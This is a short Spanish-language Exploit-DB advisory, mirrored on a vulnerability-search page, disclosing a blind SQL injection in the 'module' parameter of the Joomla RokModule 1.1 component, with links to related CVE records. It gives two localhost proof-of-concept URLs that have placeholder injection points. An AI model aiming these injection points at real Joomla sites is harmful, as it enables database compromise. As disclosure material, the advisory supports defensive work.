Lucene search
YarolinuxEDB-ID:21221HistorySep 10, 2012 - 12:00 a.m.
Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
2012-09-1000:00:00
Yarolinux
www.exploit-db.com
23
Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability
Nombre del Componente: Com_rokmodule
Empresa: http://www.rockettheme.com/
Testeado: Linux Backtrack
Autor: Yarolinux Para WebSecurityDev
Twitter: @Yarolinux
Fecha: 09/09/2012
Bueno la Injeccion Va de la siguiente manera:
http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]
http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]
Ok! Eso es todo Difrutenlo!
Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy
pronto resultados :D
Greetz: Dylan Irzi & WebSecurityDevRelated
exploitdb
exploitdb
Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
2010-04-11 00:00:00
cvelist
cvelist
CVE-2010-1479
2010-04-19 19:04:00
CVE-2010-1480
2010-04-19 19:04:00
packetstorm
packetstorm
Joomla RokModule Blind SQL Injection
2012-09-10 00:00:00
nessus
nessus
RokModule Component for Joomla! 'moduleid' Parameter SQi
2010-05-15 00:00:00
prion
prion
Sql injection
2010-04-19 19:30:00
Sql injection
2010-04-19 19:30:00
nvd
nvd
CVE-2010-1479
2010-04-19 19:30:01
CVE-2010-1480
2010-04-19 19:30:01
cve
cve
CVE-2010-1479
2010-04-19 19:30:01
CVE-2010-1480
2010-04-19 19:30:01